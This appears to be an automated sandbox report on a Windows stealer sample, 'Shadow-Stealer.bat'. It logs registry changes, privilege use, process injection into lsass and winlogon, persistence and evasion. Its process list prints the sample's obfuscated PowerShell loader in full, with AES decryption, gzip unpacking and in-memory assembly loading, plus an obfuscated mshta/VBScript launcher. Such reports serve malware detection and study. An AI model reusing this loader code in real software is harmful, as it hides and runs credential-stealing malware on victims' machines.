Key deleted \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\41b9fc45-7a65-4b28 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dfe53e2f-3835-49b0 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\$sxr-mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System C:\Windows\System32\RuntimeBroker.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\$sxr-powershell.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3156 wrote to memory of 5080 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe
PID 3156 wrote to memory of 5080 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe
PID 5080 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5080 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5080 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5080 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5080 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5080 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5080 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 5080 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 5080 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 5080 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 5080 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 5080 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 5080 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 5080 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 5080 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 5080 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4724 wrote to memory of 1708 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 4724 wrote to memory of 1708 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 1708 wrote to memory of 4412 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 1708 wrote to memory of 4412 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 4412 wrote to memory of 4304 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4412 wrote to memory of 4304 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4412 wrote to memory of 4304 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4412 wrote to memory of 4304 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4412 wrote to memory of 4304 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4412 wrote to memory of 4304 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4412 wrote to memory of 4304 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4412 wrote to memory of 4836 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 wrote to memory of 4836 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 wrote to memory of 4836 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 wrote to memory of 4836 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 wrote to memory of 4836 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 wrote to memory of 4836 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 wrote to memory of 4836 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 wrote to memory of 4836 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 wrote to memory of 4836 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 wrote to memory of 3288 N/A C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe
PID 4412 wrote to memory of 3288 N/A C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe
PID 4412 wrote to memory of 2968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4412 wrote to memory of 2968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4412 wrote to memory of 2968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4412 wrote to memory of 2968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4412 wrote to memory of 2968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4412 wrote to memory of 2968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4412 wrote to memory of 2968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4412 wrote to memory of 2968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4412 wrote to memory of 2968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4412 wrote to memory of 4308 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 wrote to memory of 4308 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 wrote to memory of 4308 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 wrote to memory of 4308 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 wrote to memory of 4308 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 wrote to memory of 4308 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 wrote to memory of 4308 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 wrote to memory of 4308 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 wrote to memory of 4308 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4412 wrote to memory of 4308 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 2968 wrote to memory of 612 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 2968 wrote to memory of 668 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 2968 wrote to memory of 948 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2968 wrote to memory of 60 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 2968 wrote to memory of 512 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe

"Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{8e8f5e92-443d-4e2e-b2e1-14cf3958c13f}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{71f57bd2-79a5-4921-a3b9-04ba2a4b3257}

C:\Windows\$sxr-mshta.exe

C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"

C:\Windows\$sxr-cmd.exe

"C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\$sxr-powershell.exe

